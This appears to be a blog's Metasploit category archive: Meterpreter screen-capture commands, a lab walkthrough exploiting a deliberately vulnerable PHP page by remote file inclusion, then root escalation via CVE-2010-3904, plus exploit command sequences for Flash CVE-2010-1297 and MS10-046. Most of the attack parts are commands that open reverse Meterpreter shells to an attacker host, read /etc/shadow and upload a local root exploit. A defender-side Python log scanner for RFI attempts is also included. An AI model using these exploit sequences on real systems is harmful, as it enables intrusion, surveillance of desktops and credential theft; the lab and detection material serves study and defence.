Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Metasploit Meterpreter screenshot screenspy screengrab

Metasploit provides some commands that extend the usage of Meterpreter. We describe below the usage of screenshot, screenspy and screengrab.

First of all, you need a valid Meterpreter session on a Windows box to use these extensions.

  • screenshot

This stdapi command lets you take a screenshot of the current Windows interactive desktop.

The screenshot command can be used with these arguments:

-h : display the help banner.
-p : the JPEG image file path. By default $HOME/[randomname].jpeg.
-q : the JPEG image quality. By default '50'.
-v : automatically view the JPEG image. By default 'true'.

(Screenshot: Metasploit Meterpreter screenshot)
  • (bg)run screenspy

Same as the screenshot command, but takes screenshots of the current Windows interactive desktop at a regular interval. Requires Firefox to view the screenshots: an HTML page containing the latest screenshot is reloaded in Firefox every x seconds.

The screenspy command can be used with these arguments:

-h : display the help banner.
-d : the delay in seconds between each screenshot. By default 3 seconds.
-t : the duration, in seconds, of the screenspy execution. By default 10 seconds.
-s : the targeted system, linux or windows. By default linux.

(Screenshot: Metasploit Meterpreter screenspy)
  • screengrab

This espia command attempts to grab a screenshot of the current Windows interactive desktop.

The screengrab command can be used with these arguments:

-h : display the help banner.

(Screenshot: Metasploit Meterpreter screengrab)
(Screenshot: Metasploit Meterpreter screengrab usage)

Remote File Inclusion and privilege escalation through Metasploit

Demonstration of an RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation is done through the CVE-2010-3904 Linux RDS protocol vulnerability.

Vulnerable web page creation

mkdir 1
vi 1/index.php
<?php
// Vulnerable by design: $color comes straight from the request and is passed
// to require(), so a URL supplied in COLOR is fetched and executed (RFI)
// when allow_url_include is enabled.
$color = 'blue';
if (isset($_REQUEST['COLOR'])) {
    $color = $_REQUEST['COLOR'];
}
require ($color . '.php');
?>

chown -R apache:apache 1

Vulnerable web page exploitation through Metasploit

use exploit/unix/webapp/php_include
show options
set PATH /1/
# XXpathXX is replaced by the URL of the PHP file served by Metasploit's own web server
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
# ifconfig is only used here to find the local IP to use for SRVHOST and LHOST
ifconfig
set SRVHOST 192.168.178.21
show options

set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit

getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow

# lpwd and lcd act on the local (attacker) side; upload pushes the exploit to the target
lpwd
lcd /home/eromang/exploits/linux/local_escalations
upload linux-rds-exploit_CVE-2010-3904

# -i: interact with the process, -f: program to execute
execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow
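As an added defender-side example (not part of the original post), the Python script below scans Apache access-log lines for the include-parameter pattern just exploited: Metasploit substitutes the URL of its own web server for XXpathXX in COLOR, so the request log shows a URL or a PHP stream wrapper where a file name should be. The log lines and the /Vt3kQ9 path are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Prefixes that turn require()/include() into a remote fetch or a stream wrapper.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://",
                   "data:", "expect://", "//", "\\\\")

def suspicious_params(target):
    """Return (name, value) pairs whose decoded value points to a remote source."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(unquote(value)).strip().lower()  # also undo double-encoding
        if decoded.startswith(REMOTE_PREFIXES) or "://" in decoded:
            hits.append((name, value))
    return hits

def scan(lines):
    """Return one finding per suspicious parameter found in the parsed log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                             "value": value, "status": int(m["status"])})
    return findings

# Constructed sample: one normal request, then three RFI attempts against the
# COLOR parameter (Metasploit replaces XXpathXX with a URL on its SRVHOST).
SAMPLE_LOG = [
    '192.168.178.30 - - [10/Jun/2010:10:00:01 +0200] "GET /1/index.php?COLOR=red HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.178.21 - - [10/Jun/2010:10:00:07 +0200] "GET /1/index.php?COLOR=http://192.168.178.21:8080/Vt3kQ9 HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
    '192.168.178.21 - - [10/Jun/2010:10:00:09 +0200] "GET /1/index.php?COLOR=http%3A%2F%2F192.168.178.21%3A8080%2FVt3kQ9 HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
    '192.168.178.21 - - [10/Jun/2010:10:00:12 +0200] "GET /1/index.php?COLOR=php://input HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']} value={f['value']} status={f['status']}")
```

A 200 status on such a request is the signal worth alerting on: with allow_url_include disabled the include fails, so the same parameter value with a 500 or a PHP warning in the error log is an attempt rather than a success.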

Video demonstration

CVE-2010-1297 : Adobe Flash Player newfunction Invalid Pointer Use

Timeline :

Vulnerability & PoC disclosed by unknown on Exploit-DB on 2010-06-09
Metasploit PoC provided on 2010-06-10

PoC provided by :

unknown
jduck

Reference(s) :

CVE-2010-1297
APSA10-01

Affected version(s) :

Adobe Flash Player 10.0.45.2, 9.0.262, and previous versions for 10.0.x and 9.0.x for Windows, Macintosh, Linux and Solaris.
Adobe Reader and Acrobat 9.3.2, and previous versions 9.x for Windows, Macintosh and UNIX.

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due to the hardcoded syscall number.

Commands :

use exploit/windows/browser/adobe_flashplayer_newfunction
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-046 : Microsoft Windows Shell LNK Execution

Timeline :

Vulnerability discovered being exploited in the wild, as part of the Stuxnet worm
Metasploit PoC provided on 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 et Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig